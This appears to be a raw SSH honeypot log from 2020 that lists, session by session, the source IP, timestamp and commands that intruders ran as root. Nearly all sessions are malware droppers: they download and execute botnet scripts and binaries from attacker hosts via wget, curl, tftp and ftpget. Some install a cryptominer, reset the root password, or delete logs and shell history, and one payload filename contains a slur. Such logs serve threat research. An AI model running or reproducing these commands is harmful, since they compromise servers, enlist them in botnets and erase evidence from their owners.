195.144.21.176 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 195.144.21.176; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.144.21.176 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://195.144.21.176/sensi.sh curl -O http://195.144.21.176/sensi.sh chmod 777 sensi.sh sh sensi.sh tftp 195.144.21.176 -c get sensi.sh chmod 777 sensi.sh sh sensi.sh tftp -r sensi2.sh -g 195.144.21.176 chmod 777 sensi2.sh sh sensi2.sh ftpget -v -u anonymous -p anonymous -P 21 195.144.21.176 sensi1.sh sensi1.sh sh sensi1.sh rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh rm -rf * From 134.122.57.124 15-Apr-2020 04:42:20 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.242/x05010/888fff999.x86; cat 888fff999.x86 > 12q1q3dfggf; chmod +x 12q1q3dfggf; ./12q1q3dfggf UnstableZombieArmy04; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.242/x05010/888fff999.x86 cat 888fff999.x86 > 12q1q3dfggf chmod +x 12q1q3dfggf ./12q1q3dfggf UnstableZombieArmy04 history -c From 104.244.73.16 16-Apr-2020 07:53:28 ssh2 root Exec cd /tmp; wget http://ionage.theworkpc.com:8088/sh.sh; curl -O http://ionage.theworkpc.com:8088/sh.sh; sh sh.sh; rm -rf sh.sh cd /tmp wget http://ionage.theworkpc.com:8088/sh.sh curl -O http://ionage.theworkpc.com:8088/sh.sh sh sh.sh rm -rf sh.sh From 104.154.244.76 16-Apr-2020 09:32:20 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 41.110.24.29/bot.pl ; curl -O 34.83.130.37/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf bot* wget 41.110.24.29/bot.pl curl -O 34.83.130.37/bot.pl perl bot.pl rm -rf bot* history -c From 35.222.66.88 16-Apr-2020 10:09:31 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 195.144.21.176/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 195.144.21.176/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp rm -rf bot* wget 195.144.21.176/bot.pl perl bot.pl rm -rf bot.pl curl -O 195.144.21.176/bot.pl perl bot.pl rm -rf bot.pl history -c From 62.171.183.29 17-Apr-2020 07:05:09 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://139.99.180.74/Reaper.sh; chmod 777 Reaper.sh; sh Reaper.sh; tftp 139.99.180.74 -c get Reapertftp1.sh; chmod 777 Reapertftp1.sh; sh Reapertftp1.sh; tftp -r Reapertftp2.sh -g 139.99.180.74; chmod 777 Reapertftp2.sh; sh Reapertftp2.sh; rm -rf Reaper.sh Reapertftp1.sh Reapertftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://139.99.180.74/Reaper.sh chmod 777 Reaper.sh sh Reaper.sh tftp 139.99.180.74 -c get Reapertftp1.sh chmod 777 Reapertftp1.sh sh Reapertftp1.sh tftp -r Reapertftp2.sh -g 139.99.180.74 chmod 777 Reapertftp2.sh sh Reapertftp2.sh rm -rf Reaper.sh Reapertftp1.sh Reapertftp2.sh rm -rf * From 51.79.157.173 18-Apr-2020 00:01:51 ssh2 root Exec nproc ; wget https://filepush.co/pdHJ/xmrig ; wget https://filepush.co/c8z8/config.json ; chmod +x * ; sysctl -w vm.nr_hugepages=12008 ; ./xmrig -B ; yes AloneInTheDark | passwd root ; nproc wget https://filepush.co/pdHJ/xmrig wget https://filepush.co/c8z8/config.json chmod +x * sysctl -w vm.nr_hugepages=12008 ./xmrig -B yes AloneInTheDark | passwd root From 34.87.0.175 20-Apr-2020 01:00:24 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 51.91.140.218/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 51.91.140.218/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp rm -rf bot* wget 51.91.140.218/bot.pl perl bot.pl rm -rf bot* curl -O 51.91.140.218/bot.pl perl bot.pl rm -rf bot* history -c From 45.95.168.133 20-Apr-2020 21:43:01 ssh2 root Exec wget http://45.95.168.127/Arceus.sh; chmod 777 Arceus.sh; ./Arceus.sh wget http://45.95.168.127/Arceus.sh chmod 777 Arceus.sh ./Arceus.sh From 51.68.226.22 23-Apr-2020 14:29:32 ssh2 root Exec grep -c ^processor /proc/cpuinfo grep -c ^processor /proc/cpuinfo From 45.95.168.131 25-Apr-2020 14:36:06 ssh2 root Exec wget http://45.95.168.127/zeros6x.sh; chmod 777 zeros6x.sh; ./zeros6x.sh wget http://45.95.168.127/zeros6x.sh chmod 777 zeros6x.sh ./zeros6x.sh From 195.231.11.179 26-Apr-2020 00:53:03 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://107.172.157.176/Cipher.sh; chmod 777 Cipher.sh; sh Cipher.sh; tftp 107.172.157.176 -c get Ciphertftp1.sh; chmod 777 Ciphertftp1.sh; sh Ciphertftp1.sh; tftp -r Ciphertftp2.sh -g 107.172.157.176; chmod 777 Ciphertftp2.sh; sh Ciphertftp2.sh; rm -rf Cipher.sh Ciphertftp1.sh Ciphertftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://107.172.157.176/Cipher.sh chmod 777 Cipher.sh sh Cipher.sh tftp 107.172.157.176 -c get Ciphertftp1.sh chmod 777 Ciphertftp1.sh sh Ciphertftp1.sh tftp -r Ciphertftp2.sh -g 107.172.157.176 chmod 777 Ciphertftp2.sh sh Ciphertftp2.sh rm -rf Cipher.sh Ciphertftp1.sh Ciphertftp2.sh rm -rf * From 217.61.7.239 26-Apr-2020 06:27:27 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://37.49.226.182/astrobins.sh; chmod 777 astrobins.sh; sh astrobins.sh; tftp 37.49.226.182 -c get astrotftp1.sh; chmod 777 astrotftp1.sh; sh astrotftp1.sh; tftp -r astrotftp2.sh -g 37.49.226.182; chmod 777 astrotftp2.sh; sh astrotftp2.sh; rm -rf astrobins.sh astrotftp1.sh astrotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://37.49.226.182/astrobins.sh chmod 777 astrobins.sh sh astrobins.sh tftp 37.49.226.182 -c get astrotftp1.sh chmod 777 astrotftp1.sh sh astrotftp1.sh tftp -r astrotftp2.sh -g 37.49.226.182 chmod 777 astrotftp2.sh sh astrotftp2.sh rm -rf astrobins.sh astrotftp1.sh astrotftp2.sh rm -rf * From 37.49.226.212 1-May-2020 11:24:18 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://176.32.35.22/shoppinglistbins.sh; chmod 777 shoppinglistbins.sh; sh shoppinglistbins.sh; tftp 185.172.110.221 -c get shoppinglisttftp1.sh; chmod 777 shoppinglisttftp1.sh; sh shoppinglisttftp1.sh; tftp -r shoppinglisttftp2.sh -g 185.172.110.221; chmod 777 shoppinglisttftp2.sh; sh shoppinglisttftp2.sh; rm -rf shoppinglistbins.sh shoppinglisttftp1.sh shoppinglisttftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://176.32.35.22/shoppinglistbins.sh chmod 777 shoppinglistbins.sh sh shoppinglistbins.sh tftp 185.172.110.221 -c get shoppinglisttftp1.sh chmod 777 shoppinglisttftp1.sh sh shoppinglisttftp1.sh tftp -r shoppinglisttftp2.sh -g 185.172.110.221 chmod 777 shoppinglisttftp2.sh sh shoppinglisttftp2.sh rm -rf shoppinglistbins.sh shoppinglisttftp1.sh shoppinglisttftp2.sh rm -rf * From 37.49.226.211 4-May-2020 05:39:03 ssh2 root Exec cd /tmp; wget http://185.244.150.141/x86; chmod 777 *; ./x86 servers; rm -rf * cd /tmp wget http://185.244.150.141/x86 chmod 777 * ./x86 servers rm -rf * From 34.68.119.229 5-May-2020 01:36:02 ssh2 root Exec cat /etc/issue ; cd /tmp; wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 133.167.105.83 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 133.167.105.83; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.32.234.129/Hilix.sh; curl -O http://45.32.234.129/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 45.32.234.129 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 45.32.234.129; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.32.234.129 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf * cat /etc/issue cd /tmp wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh chmod 777 gtop.sh sh gtop.sh busybox tftp 133.167.105.83 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh busybox tftp -r tftp2.sh -g 133.167.105.83 chmod 777 tftp2.sh sh tftp2.sh rm -rf gtop.sh tftp1.sh tftp2.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.32.234.129/Hilix.sh curl -O http://45.32.234.129/Hilix.sh chmod 777 Hilix.sh sh Hilix.sh tftp 45.32.234.129 -c get Hilix3.sh chmod 777 Hilix3.sh sh Hilix3.sh tftp -r Hilix2.sh -g 45.32.234.129 chmod 777 Hilix2.sh sh Hilix2.sh ftpget -v -u anonymous -p anonymous -P 21 45.32.234.129 Hilix1.sh Hilix1.sh sh Hilix1.sh rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh rm -rf * From 31.220.1.210 6-May-2020 21:25:10 ssh2 root Exec cd /tmp; wget http://31.220.40.9/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.x86; chmod 777 *; ./whoareyou.x86 servers; rm -rf * cd /tmp wget http://31.220.40.9/ABCDEFGHIJKLMNOPQRSTUVWXYZ/whoareyou.x86 chmod 777 * ./whoareyou.x86 servers rm -rf * From 173.212.220.105 7-May-2020 04:52:53 ssh2 root Exec echo 'RyM_Gang' echo 'RyM_Gang' From 173.212.220.105 7-May-2020 06:00:46 ssh2 root Exec cd /tmp; wget http://194.36.188.170/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; rm -rf ssh.sh cd /tmp wget http://194.36.188.170/ssh.sh chmod 777 ssh.sh sh ssh.sh rm -rf ssh.sh From 74.208.29.33 7-May-2020 06:26:09 ssh2 root apt-get install postfix service postfix restart /etc/pm/init.d/ postfix restart /etc/init.d/postfix restart locate postfix apt-get install mlocate lcoate postfix locate postfix service postfix restart postfix restart From 37.49.226.211 7-May-2020 14:26:32 ssh2 root Exec cd /tmp; wget http://45.129.2.190/x86; chmod 777 *; ./x86 servers; rm -rf * cd /tmp wget http://45.129.2.190/x86 chmod 777 * ./x86 servers rm -rf * From 5.101.151.83 8-May-2020 05:07:16 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.95.168.207/EkSgbins.sh; chmod 777 EkSgbins.sh; sh EkSgbins.sh; tftp 45.95.168.207 -c get EkSgtftp1.sh; chmod 777 EkSgtftp1.sh; sh EkSgtftp1.sh; tftp -r EkSgtftp2.sh -g 45.95.168.207; chmod 777 EkSgtftp2.sh; sh EkSgtftp2.sh; rm -rf EkSgbins.sh EkSgtftp1.sh EkSgtftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.95.168.207/EkSgbins.sh chmod 777 EkSgbins.sh sh EkSgbins.sh tftp 45.95.168.207 -c get EkSgtftp1.sh chmod 777 EkSgtftp1.sh sh EkSgtftp1.sh tftp -r EkSgtftp2.sh -g 45.95.168.207 chmod 777 EkSgtftp2.sh sh EkSgtftp2.sh rm -rf EkSgbins.sh EkSgtftp1.sh EkSgtftp2.sh rm -rf * From 35.203.79.78 8-May-2020 08:32:00 ssh2 root Exec cat /etc/issue ; cd /tmp; wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 133.167.105.83 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 133.167.105.83; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh cat /etc/issue cd /tmp wget http://133.167.105.83/gtop.sh || curl -O http://133.167.105.83/gtop.sh chmod 777 gtop.sh sh gtop.sh busybox tftp 133.167.105.83 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh busybox tftp -r tftp2.sh -g 133.167.105.83 chmod 777 tftp2.sh sh tftp2.sh rm -rf gtop.sh tftp1.sh tftp2.sh From 158.176.180.62 8-May-2020 09:27:03 ssh2 root Exec cat /etc/issue ; nproc cat /etc/issue nproc From 35.154.2.242 8-May-2020 09:42:43 ssh2 root Exec uname -a ; uname -a From 195.231.11.144 8-May-2020 10:22:13 ssh2 root Exec wget http://104.168.96.168/x86; chmod 777 x86; ./x86 ROOTS wget http://104.168.96.168/x86 chmod 777 x86 ./x86 ROOTS From 37.49.226.19 8-May-2020 18:17:22 ssh2 root Exec cd /tmp; wget http://192.236.155.130/x86; chmod 777 *; ./x86 servers; rm -rf * cd /tmp wget http://192.236.155.130/x86 chmod 777 * ./x86 servers rm -rf * From 185.53.88.182 8-May-2020 18:57:42 ssh2 root Exec wget http://185.53.88.182/AB4g5/kiga.x86; chmod 777 kiga.x86; ./kiga.x86 ROOTS wget http://185.53.88.182/AB4g5/kiga.x86 chmod 777 kiga.x86 ./kiga.x86 ROOTS From 88.231.63.158 8-May-2020 20:33:20 ssh2 root history ws ls w wo who cat /etc/redhat-release history From 64.180.216.27 8-May-2020 23:03:11 ssh2 root Exec echo "cd /tmp; wget http://46.246.37.136/wget.sh || curl http://46.246.37.136/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp wget http://46.246.37.136/wget.sh || curl http://46.246.37.136/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 5.101.151.83 9-May-2020 03:10:51 ssh2 root Exec wget http://45.95.168.207/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 AutoRoots wget http://45.95.168.207/jKira.x86 chmod 777 jKira.x86 ./jKira.x86 AutoRoots From 195.231.11.201 9-May-2020 12:32:30 ssh2 root Exec wget http://195.123.213.216/HORNY1/x86; chmod 777 x86; ./x86 test wget http://195.123.213.216/HORNY1/x86 chmod 777 x86 ./x86 test From 178.79.189.143 17-May-2020 20:53:23 ssh2 root Exec cd /tmp; wget http://185.172.110.240/loader.sh; chmod 777 loader.sh; sh loader.sh; rm -rf loader.sh cd /tmp wget http://185.172.110.240/loader.sh chmod 777 loader.sh sh loader.sh rm -rf loader.sh From 34.92.52.16 23-May-2020 09:10:38 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf x86 ; wget 93.114.82.154/x86 ; chmod 777 x86 ; ./x86 ; rm -rf x86 ; history -c ; echo nite was here > nitewashere cat /etc/issue cd /tmp rm -rf x86 wget 93.114.82.154/x86 chmod 777 x86 ./x86 rm -rf x86 history -c echo nite was here > nitewashere From 119.251.181.196 24-May-2020 10:46:08 ssh2 root 鿴ϵͳں uname -a ps -aux From 119.251.181.196 24-May-2020 10:52:17 ssh2 root wget --no-check-certificate https://raw.github.com/Lozy/danted/master/install.sh -O install.sh bash install.sh --port=19999 --user=qq01 --passwd=a123456a yum -y install wget wget -q -N --no-check-certificate https://raw.githubusercontent.com/wyx176/Socks5/master/install.sh bash install.sh yum install gcc apt-get inatall gcc wget http://103.19.3.180:5523/12345 yum -y install wget From 221.228.72.222 27-May-2020 09:13:49 ssh2 root Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu From 221.228.72.222 27-May-2020 09:13:50 ssh2 root Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu From 221.228.72.222 27-May-2020 09:13:50 ssh2 root Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu Exec uname -a & lscpu uname -a lscpu From 37.120.211.124 27-May-2020 11:25:26 ssh2 root Exec df -h df -h From 194.99.105.248 28-May-2020 00:31:41 ssh2 root df -h uname -a mkdir /var/run/logging.service mkdir ls cd Ma ls cd Mail ls cd / ls mkdir wget ls From 194.99.105.248 28-May-2020 00:34:32 ssh2 root df -h ls From 185.192.70.77 2-Jun-2020 20:12:41 ssh2 root w nproc uname-a From 85.209.0.102 2-Jun-2020 20:12:50 ssh2 root uname cat /etc/lease ifconfig w top wget cd /tmp ls -a From 185.192.70.77 2-Jun-2020 20:15:00 ssh2 root wget 185.162.235.222/e From 185.192.70.77 2-Jun-2020 20:15:28 ssh2 root wget 1http:// history ps x kill -9 22262 ps x ls -la /proc/17509 From 185.192.70.77 2-Jun-2020 20:17:01 ssh2 root wget http://192.254.204.95/Scanmd2019.jpg wget wget -c http://192.254.204.95/Scanmd2019.jpg ls -a ./test.pl nano pico vim vi cat cat test.pl From 51.81.53.159 3-Jun-2020 17:30:21 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget https://filepush.co/Vp2p/bot.pl | curl -O https://filepush.co/Vp2p/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs ; history -c cat /etc/issue cd /tmp rm -rf bot* wget https://filepush.co/Vp2p/bot.pl | curl -O https://filepush.co/Vp2p/bot.pl perl bot.pl rm -rf bot* history -c rm -rf /var/log rm -rf /tmp/logs history -c From 46.246.49.79 3-Jun-2020 17:53:45 ssh2 root Exec echo "cat /proc/*/mounts" | sh echo "cat /proc/*/mounts" | sh From 144.172.73.34 6-Jun-2020 00:15:32 ssh2 root Exec echo test echo test From 163.172.129.13 7-Jun-2020 12:57:51 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 163.172.129.13/bot.pl ; curl -O 163.172.129.13/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs ; history -c cat /etc/issue cd /tmp rm -rf bot* wget 163.172.129.13/bot.pl curl -O 163.172.129.13/bot.pl perl bot.pl rm -rf bot* history -c rm -rf /var/log rm -rf /tmp/logs history -c From 62.210.107.220 11-Jun-2020 09:33:37 ssh2 root Exec cat /etc/issue ; cd /tmp ; rm -rf bot* ; wget 62.210.107.220/bot.pl ; curl -O 62.210.107.220/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c ; rm -rf /var/log ; rm -rf /tmp/logs cat /etc/issue cd /tmp rm -rf bot* wget 62.210.107.220/bot.pl curl -O 62.210.107.220/bot.pl perl bot.pl rm -rf bot* history -c rm -rf /var/log rm -rf /tmp/logs From 93.157.62.102 14-Jun-2020 06:16:02 ssh2 root Exec wget http://185.172.110.214/AB4g5/kiga.x86; chmod 777 *; ./kiga.x86 Roots;rm -rf kiga.x86; history -c wget http://185.172.110.214/AB4g5/kiga.x86 chmod 777 * ./kiga.x86 Roots rm -rf kiga.x86 history -c From 59.127.135.77 18-Jun-2020 20:02:58 ssh2 root Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.40.75/bin.sh || curl http://46.246.40.75/curl.sh -o curl.sh; chmod +x *.sh; ./bin.sh; ./curl.sh' | sh echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / rm *.sh wget http://46.246.40.75/bin.sh || curl http://46.246.40.75/curl.sh -o curl.sh chmod +x *.sh ./bin.sh ./curl.sh' | sh From 162.247.73.192 19-Jun-2020 22:13:00 ssh2 root Exec echo HOIQ9MK2P6 echo HOIQ9MK2P6 From 104.244.76.189 20-Jun-2020 15:50:05 ssh2 root Exec echo 0jquhkhtm5e2yv08 echo 0jquhkhtm5e2yv08 From 23.129.64.217 20-Jun-2020 15:53:50 ssh2 root Exec echo e5s6376onuuy72up echo e5s6376onuuy72up From 67.225.190.237 21-Jun-2020 10:12:44 ssh2 root Exec echo NGONH9QH4A echo NGONH9QH4A From 205.185.125.216 24-Jun-2020 22:58:58 ssh2 root Exec echo UGKSCIZ1WA echo UGKSCIZ1WA From 194.180.224.130 26-Jun-2020 03:59:18 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://isupreme.ir/r00xl.sh; curl -O http://isupreme.ir/r00xl.sh; chmod 777 r00xl.sh; sh r00xl.sh; tftp isupreme.ir -c get r00xl.sh; chmod 777 r00xl.sh; sh r00xl.sh; tftp -r r00xl2.sh -g isupreme.ir; chmod 777 r00xl2.sh; sh r00xl2.sh; ftpget -v -u anonymous -p anonymous -P 21 isupreme.ir r00xl1.sh r00xl1.sh; sh r00xl1.sh; rm -rf r00xl.sh r00xl.sh r00xl2.sh r00xl1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://isupreme.ir/r00xl.sh curl -O http://isupreme.ir/r00xl.sh chmod 777 r00xl.sh sh r00xl.sh tftp isupreme.ir -c get r00xl.sh chmod 777 r00xl.sh sh r00xl.sh tftp -r r00xl2.sh -g isupreme.ir chmod 777 r00xl2.sh sh r00xl2.sh ftpget -v -u anonymous -p anonymous -P 21 isupreme.ir r00xl1.sh r00xl1.sh sh r00xl1.sh rm -rf r00xl.sh r00xl.sh r00xl2.sh r00xl1.sh rm -rf * From 66.55.92.15 26-Jun-2020 06:57:59 ssh2 root Exec echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`";(curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 http://do-dear.com/bots/zax 2>/dev/null || wget -q --connect-timeout 5 --timeout 10 --tries 2 -O- http://do-dear.com/bots/zax 2>/dev/null) | perl >/dev/null 2>&1 echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`" (curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 http://do-dear.com/bots/zax 2>/dev/null || wget -q --connect-timeout 5 --timeout 10 --tries 2 -O- http://do-dear.com/bots/zax 2>/dev/null) | perl >/dev/null 2> 1 From 51.75.52.118 26-Jun-2020 18:18:41 ssh2 root Exec echo 4PYT5GLP0Q echo 4PYT5GLP0Q From 209.141.39.98 28-Jun-2020 16:16:18 ssh2 root Exec echo I3RS2BN0F7 echo I3RS2BN0F7 From 40.71.33.88 28-Jun-2020 20:18:27 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec sudo echo $UID sudo echo $UID From 67.225.190.237 1-Jul-2020 07:26:36 ssh2 root Exec echo 3FIDGUUKMR echo 3FIDGUUKMR From 137.117.92.108 2-Jul-2020 02:34:01 ssh2 root Exec sudo echo $UID sudo echo $UID From 185.165.168.229 3-Jul-2020 16:36:09 ssh2 root Exec echo MG7ZO7T3JX echo MG7ZO7T3JX From 51.195.136.190 3-Jul-2020 16:50:07 ssh2 root Exec echo ME7V4Z9ROM echo ME7V4Z9ROM From 45.143.220.79 3-Jul-2020 23:40:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.82.70.140/kwari.sh; curl -O http://80.82.70.140/kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp 80.82.70.140 -c get kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp -r kwari2.sh -g 80.82.70.140; chmod 777 kwari2.sh; sh kwari2.sh; ftpget -v -u anonymous -p anonymous -P 21 80.82.70.140 kwari1.sh kwari1.sh; sh kwari1.sh; rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://80.82.70.140/kwari.sh curl -O http://80.82.70.140/kwari.sh chmod 777 kwari.sh sh kwari.sh tftp 80.82.70.140 -c get kwari.sh chmod 777 kwari.sh sh kwari.sh tftp -r kwari2.sh -g 80.82.70.140 chmod 777 kwari2.sh sh kwari2.sh ftpget -v -u anonymous -p anonymous -P 21 80.82.70.140 kwari1.sh kwari1.sh sh kwari1.sh rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh rm -rf * From 46.246.38.61 4-Jul-2020 00:30:14 ssh2 root Exec cd /tmp; wget http://46.246.38.61/wget.sh -O - | sh cd /tmp wget http://46.246.38.61/wget.sh -O - | sh From 185.220.101.212 7-Jul-2020 08:18:32 ssh2 root Exec echo Z9JG5YNFM8 echo Z9JG5YNFM8 From 162.247.73.192 7-Jul-2020 08:18:34 ssh2 root Exec echo ERSZKWPG2Z echo ERSZKWPG2Z From 45.143.220.55 7-Jul-2020 11:26:48 ssh2 root Exec cd /tmp; wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; chmod 777 infn.x86; ./infn.x86 servers; rm -rf * cd /tmp wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86 chmod 777 infn.x86 ./infn.x86 servers rm -rf * From 64.227.26.221 7-Jul-2020 22:21:45 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://45.95.168.196/yoyobins.sh; chmod 777 yoyobins.sh; sh yoyobins.sh; tftp 45.95.168.196 -c get yoyotftp1.sh; chmod 777 yoyotftp1.sh; sh yoyotftp1.sh; tftp -r yoyotftp2.sh -g 45.95.168.196; chmod 777 yoyotftp2.sh; sh yoyotftp2.sh; rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://45.95.168.196/yoyobins.sh chmod 777 yoyobins.sh sh yoyobins.sh tftp 45.95.168.196 -c get yoyotftp1.sh chmod 777 yoyotftp1.sh sh yoyotftp1.sh tftp -r yoyotftp2.sh -g 45.95.168.196 chmod 777 yoyotftp2.sh sh yoyotftp2.sh rm -rf yoyobins.sh yoyotftp1.sh yoyotftp2.sh rm -rf * From 194.180.224.103 8-Jul-2020 09:21:41 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://46.4.152.178/reportmybinsfaggotbins.sh; chmod 777 reportmybinsfaggotbins.sh; sh reportmybinsfaggotbins.sh; tftp 46.4.152.178 -c get reportmybinsfaggottftp1.sh; chmod 777 reportmybinsfaggottftp1.sh; sh reportmybinsfaggottftp1.sh; tftp -r reportmybinsfaggottftp2.sh -g 46.4.152.178; chmod 777 reportmybinsfaggottftp2.sh; sh reportmybinsfaggottftp2.sh; rm -rf reportmybinsfaggotbins.sh reportmybinsfaggottftp1.sh reportmybinsfaggottftp2.sh; rm -rf * cat /etc/issue cd /tmp || cd /run || cd / wget http://46.4.152.178/reportmybinsfaggotbins.sh chmod 777 reportmybinsfaggotbins.sh sh reportmybinsfaggotbins.sh tftp 46.4.152.178 -c get reportmybinsfaggottftp1.sh chmod 777 reportmybinsfaggottftp1.sh sh reportmybinsfaggottftp1.sh tftp -r reportmybinsfaggottftp2.sh -g 46.4.152.178 chmod 777 reportmybinsfaggottftp2.sh sh reportmybinsfaggottftp2.sh rm -rf reportmybinsfaggotbins.sh reportmybinsfaggottftp1.sh reportmybinsfaggottftp2.sh rm -rf * From 209.141.47.92 9-Jul-2020 00:18:32 ssh2 root Exec cat /etc/issue; busybox wget http://205.185.117.32/x86_64; chmod 777 *; ./x86_64 linux.x86 cat /etc/issue busybox wget http://205.185.117.32/x86_64 chmod 777 * ./x86_64 linux.x86 From 37.49.224.35 9-Jul-2020 12:07:50 ssh2 root Exec wget 45.95.168.219/SBIDIOT/root; chmod +x root; ./root wget 45.95.168.219/SBIDIOT/root chmod +x root ./root From 93.157.62.102 9-Jul-2020 13:20:40 ssh2 root Exec wget http://194.180.224.134/5311qjmikurawepedalnqmashrabotatuk61119123c/KigaNet.x86; chmod 777 *; ./KigaNet.x86 Roots; rm -rf Kiga*; history -c wget http://194.180.224.134/5311qjmikurawepedalnqmashrabotatuk61119123c/KigaNet.x86 chmod 777 * ./KigaNet.x86 Roots rm -rf Kiga* history -c From 45.95.168.250 9-Jul-2020 15:46:15 ssh2 root Exec wget http://45.95.168.250/x86; chmod 777 x86; ./x86 ; rm -rf x86; history -c wget http://45.95.168.250/x86 chmod 777 x86 ./x86 rm -rf x86 history -c From 45.95.168.176 9-Jul-2020 17:33:22 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.226.35/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.226.35/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86 cat Meth.x86 > sn0rt chmod +x sn0rt ./sn0rt ROOTED history -c From 116.127.106.194 10-Jul-2020 11:35:31 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.38.61/wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://46.246.38.61/wget.sh || curl http://46.246.38.61/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 37.176.182.134 